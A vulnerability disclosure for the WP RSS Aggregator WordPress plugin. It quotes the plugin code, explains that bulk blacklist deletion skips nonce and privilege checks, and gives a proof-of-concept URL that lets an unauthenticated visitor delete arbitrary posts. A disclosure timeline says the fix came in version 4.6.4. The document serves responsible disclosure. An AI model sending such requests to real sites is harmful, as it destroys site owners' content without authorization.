feed-blacklist.php is run every time when website is displayed.
File: wp-rss-aggregator\wp-rss-aggregator.php
/* Load the blacklist functions file */
require_once ( WPRSS_INC . 'feed-blacklist.php' );wprss_check_if_blacklist_delete() is run on init action.
File: wp-rss-aggregator\includes\feed-blacklist.php
// Check if deleting a blacklist item, from the GET parameter
add_action( 'init', 'wprss_check_if_blacklist_delete' );Administrator privileges are NOT checked when we pass $_GET['wprss-bulk'].
File: wp-rss-aggregator\includes\feed-blacklist.php
function wprss_check_if_blacklist_delete() {
// If the GET param is not set, do nothing. Return.
if ( empty( $_GET['wprss-blacklist-remove'] ) ) return;
// The array of blacklist entries to delete
$to_delete = array();
// The ID of the blacklist entry - if only deleting a single entry
$ID = $_GET['wprss-blacklist-remove'];
// check if deleting in bulk
if ( isset( $_GET['wprss-bulk'] ) && $_GET['wprss-bulk'] == '1' ) {
$to_delete = explode( ',', $ID );
} else {
$to_delete = array( $ID );
// Get the ID from the GET param
// Verify the nonce
check_admin_referer( 'blacklist-remove-' . $ID, 'wprss_blacklist_trash' );
}
// Delete the posts marked for delete
foreach( $to_delete as $delete_id ) {
wp_delete_post( $delete_id, TRUE );
}
// Redirect back to blacklists page
$paged = isset( $_GET['paged'] )? '&paged=' . $_GET['paged'] : '';
header('Location: ' . admin_url('edit.php?post_type=wprss_blacklist' . $paged ) );
exit;
}Proof of Concept
Anyone can delete any posts.
For example delete post ID=1 and ID=2:
http://wordpress-install/?wprss-blacklist-remove=1,2&wprss-bulk=1Timeline
- 08-11-2014: Discovered
- 08-11-2014: Vendor notified
- 10-11-2014: Version 4.6.4 released, issue resolved